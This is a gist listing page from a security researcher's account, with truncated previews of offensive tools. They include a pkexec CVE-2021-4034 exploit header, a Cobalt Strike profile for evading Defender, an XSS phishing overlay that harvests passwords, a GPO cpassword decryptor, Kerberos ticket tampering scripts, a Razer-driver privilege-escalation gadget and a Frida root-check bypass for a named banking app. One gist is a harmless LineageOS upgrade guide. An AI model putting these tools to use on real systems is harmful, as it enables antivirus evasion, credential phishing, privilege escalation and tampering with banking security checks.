tothi / blasty-vs-pkexec-mod.c
Last active January 27, 2022 18:55
CVE-2021-4034
/*
* blasty-vs-pkexec-mod.c -- by blasty <[email protected]>
* ------------------------------------------------
* PoC for CVE-2021-4034, shout out to Qualys
*
* ctf quality exploit
*
* bla bla irresponsible disclosure
*
* -- blasty // 2022-01-25
tothi / upgrade_LineageOS_with_Magisk.md
Last active January 19, 2025 11:53
Upgrading LineageOS and reinstalling Magisk

Upgrade LineageOS with Magisk

WARNING: tested only on my setup (LineageOS 18.1 on instantnoodle), other setups may break and brick the device!

Step-by-step instructions (for reinstalling patched boot.img for Magisk):

  1. upgrade LineageOS to the latest version the standard way in the Android GUI (download + install + reboot)
  2. if not using the latest Magisk: wipe the old (possibly hidden) Magisk app, then install the up-to-date one from the official Magisk GitHub repo
  3. install (git clone) payload_dumper from GitHub (in Termux or in an SSH session on the Android device) for the first time, or update it (git pull) later
  4. in the Android terminal session: wget the same LineageOS nightly image installed in step 1 from https://download.lineageos.org/
tothi / minimal-defender-bypass.profile
Last active April 1, 2025 22:38
Minimal Cobalt Strike C2 Profile for Bypassing Defender
# in addition to the profile, a stage0 loader is also required (default generated payloads are caught by signatures)
# as stage0, remote injecting a thread into a suspended process works
set host_stage "false";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.62";
set sleeptime "10000";
stage {
set allocator "MapViewOfFile";
set name "notevil.dll";
tothi / setKerbRealm.py
Created November 25, 2021 16:46
This script modifies the unencrypted realm part of a Kerberos ticket (passed as a kirbi file) using the impacket library
#!/usr/bin/env python
#
# This script modifies the unencrypted realm part of a Kerberos ticket (passed as a kirbi file) using the impacket library
#
from pyasn1.codec.der import decoder, encoder
from impacket.krb5.asn1 import KRB_CRED, Ticket, seq_set_iter
from impacket.krb5 import types
tothi / xss-phisher.js
Created November 3, 2021 02:50
XSS Phishing Payload
var html = `
<div id=\"bg\" style=\"position: absolute; z-index: 100; width: 100%; height: 100%; background-color: #000000; opacity: 0.5; top: 0; left: 0; margin: 0\">
</div>
<div id=\"form\" style=\"position: absolute; z-index: 150; font-family: Arial; background-color: #ffffff; width: 280px; height: 185px; top: 50%; left: 40%; padding: 10px\">
<p>An error occurred. Please login again.</p>
<form id=\"phishingForm\"">
<p>Username <input type=\"text\" name=\"username\"></p>
<p>Password <input type=\"password\" name=\"password\"></p>
<p><input type=\"submit\" value=\"Login\"></p>
</form>
tothi / gpo-decrypt.py
Created October 10, 2021 22:56
Decrypt "cpassword" found in GPO configs
#!/usr/bin/env python3
import sys
from base64 import b64decode
from Crypto.Cipher import AES
def decrypt(cpass):
key = b'\x4e\x99\x06\xe8\xfc\xb6\x6c\xc9\xfa\xf4\x93\x10\x62\x0f\xfe\xe8' \
b'\xf4\x96\xe8\x06\xcc\x05\x79\x90\x20\x9b\x09\xa4\x33\xb6\x6c\x1b'
iv = b'\x00' * 16
tothi / PwnHistory.md
Created September 17, 2021 21:33
Combine cracked historical passwords with numbers in order to crack the current ones

Attacking user behaviour as a consequence of forced regular password change

Let's assume ophcrack is used for cracking NT hashes in pwdump format, where the pwdump also includes the password history hashes. Assume we have already cracked several hashes from the history.

Steps for getting more passwords cracked (assuming users just increase/decrease/edit the numbers at the end of their passwords on each regular, policy-forced password change):

  1. Get cracked passwords (including history):
cat ophcrack.pwdump | grep -v ':::$' | awk -F: '{ print $7 }' | sort -u > wordlist_ophcracked.txt
tothi / decryptKerbTicket.py
Last active February 15, 2025 00:16 — forked from xan7r/decryptKerbTicket.py
Decrypt kerberos tickets and parse out authorization data
#!/usr/bin/env python3
# NOTE: this script was created for educational purposes to assist learning about kerberos tickets.
# Likely to have a few bugs that cause it to fail to decrypt some TGT or Service tickets.
#
# Recommended Instructions:
# Obtain valid kerberos tickets using Rubeus or mimikatz "sekurlsa::tickets /export"
# Optionally convert tickets to ccache format using kekeo "misc::convert ccache <ticketName.kirbi>"
# Obtain appropriate aes256 key using dcsync (krbtgt for TGT or usually target computer account for Service Ticket)
# Run this script to decrypt:
# ./decryptKerbTicket.py -k 5c7ee0b8f0ffeedbeefdeadbeeff1eefc7d313620feedbeefdeadbeefafd601e -t ./[email protected][email protected]
tothi / usbgadget_razer.sh
Created August 22, 2021 09:52
Razer USB gadget on Android for Local Privilege Escalation on Windows
# MINIMAL USB gadget setup using CONFIGFS for simulating Razer Gaming HID
# devices for triggering the vulnerable Windows Driver installer
# credits for the Windows Driver install vuln: @j0nh4t
#
# https://twitter.com/j0nh4t/status/1429049506021138437
# https://twitter.com/an0n_r0/status/1429263450748895236
#
# the script was developed & tested on Android LineageOS 18.1
tothi / antirootbypass.js
Created August 12, 2021 01:24
Frida antiroot check bypass for hu.khb (using com.vasco.digipass)
// Frida dumb antiroot check bypass on LineageOS for the
// com.vasco.digipass root checker in hu.khb banking app
//
// run with: frida -U -f hu.khb -l antirootbypass.js --no-pause
// root file existence check
Interceptor.attach(Module.findExportByName(null, 'access'), {
onEnter: function (args) {
this._pathname = args[0].readCString();
this._mode = args[1];